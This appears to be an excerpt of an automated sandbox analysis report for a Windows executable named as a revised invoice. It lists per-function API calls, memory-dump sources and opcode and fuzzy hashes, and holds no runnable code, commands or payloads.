                              • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                              • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                              APIs
                                • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                              • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                              • _wcslen.LIBCMT ref: 00449519
                              • _wcslen.LIBCMT ref: 00449526
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: MessageSend_wcslen$_wcspbrk
                              • String ID:
                              • API String ID: 2886238975-0
                              • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                              • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                              • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                              • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: __setmode$DebugOutputString_fprintf
                              • String ID:
                              • API String ID: 1792727568-0
                              • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                              • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                              • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                              • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                              APIs
                                • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                              • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Window$Long$AttributesLayered
                              • String ID:
                              • API String ID: 2169480361-0
                              • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                              • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                              • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                              • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                              APIs
                                • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                              • lstrlenW.KERNEL32(?), ref: 00434CF6
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                              • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: lstrcmpilstrcpylstrlen$_malloc
                              • String ID: cdecl
                              • API String ID: 3850814276-3896280584
                              • Opcode ID: c1d0e3fd88ced86f6f3832065c3908be80ab03c979ff4d6bcf24e5a7885ffd19
                              • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                              • Opcode Fuzzy Hash: c1d0e3fd88ced86f6f3832065c3908be80ab03c979ff4d6bcf24e5a7885ffd19
                              • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                              APIs
                                • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                              • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                              • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                              • _memmove.LIBCMT ref: 0046D475
                              • inet_ntoa.WSOCK32(?), ref: 0046D481
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                              • String ID:
                              • API String ID: 2502553879-0
                              • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                              • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                              • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                              • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                              APIs
                              • SendMessageW.USER32 ref: 00448C69
                              • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                              • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                              • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: MessageSend$LongWindow
                              • String ID:
                              • API String ID: 312131281-0
                              • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                              • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                              • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                              • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                              APIs
                              • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                              • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                              • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                              • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ErrorLastacceptselect
                              • String ID:
                              • API String ID: 385091864-0
                              • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                              • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                              • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                              • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                              APIs
                              • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: MessageSend
                              • String ID:
                              • API String ID: 3850602802-0
                              • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                              • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                              • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                              • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                              APIs
                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                              • GetStockObject.GDI32(00000011), ref: 00430258
                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                              • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Window$CreateMessageObjectSendShowStock
                              • String ID:
                              • API String ID: 1358664141-0
                              • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                              • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                              • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                              • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                              APIs
                              • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                              • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                              • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                              • String ID:
                              • API String ID: 2880819207-0
                              • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                              • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                              • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                              • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                              APIs
                              • GetWindowRect.USER32(?,?), ref: 00430BA2
                              • ScreenToClient.USER32(?,?), ref: 00430BC1
                              • ScreenToClient.USER32(?,?), ref: 00430BE2
                              • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ClientRectScreen$InvalidateWindow
                              • String ID:
                              • API String ID: 357397906-0
                              • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                              • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                              • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                              • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                              APIs
                              • __wsplitpath.LIBCMT ref: 0043392E
                                • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                              • __wsplitpath.LIBCMT ref: 00433950
                              • __wcsicoll.LIBCMT ref: 00433974
                              • __wcsicoll.LIBCMT ref: 0043398A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                              • String ID:
                              • API String ID: 1187119602-0
                              • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                              • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                              • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                              • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _wcslen$_malloc_wcscat_wcscpy
                              • String ID:
                              • API String ID: 1597257046-0
                              • Opcode ID: 15947565afd9da0c51d6b39d986381e9b8142da2aa4972dda906e7c054fe1a7b
                              • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                              • Opcode Fuzzy Hash: 15947565afd9da0c51d6b39d986381e9b8142da2aa4972dda906e7c054fe1a7b
                              • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                              APIs
                              • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                              • __malloc_crt.LIBCMT ref: 0041F5B6
                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: EnvironmentStrings$Free__malloc_crt
                              • String ID:
                              • API String ID: 237123855-0
                              • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                              • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                              • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                              • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: DeleteDestroyObject$IconWindow
                              • String ID:
                              • API String ID: 3349847261-0
                              • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                              • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                              • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                              • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                              APIs
                              • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                              • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                              • String ID:
                              • API String ID: 2223660684-0
                              • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                              • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                              • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
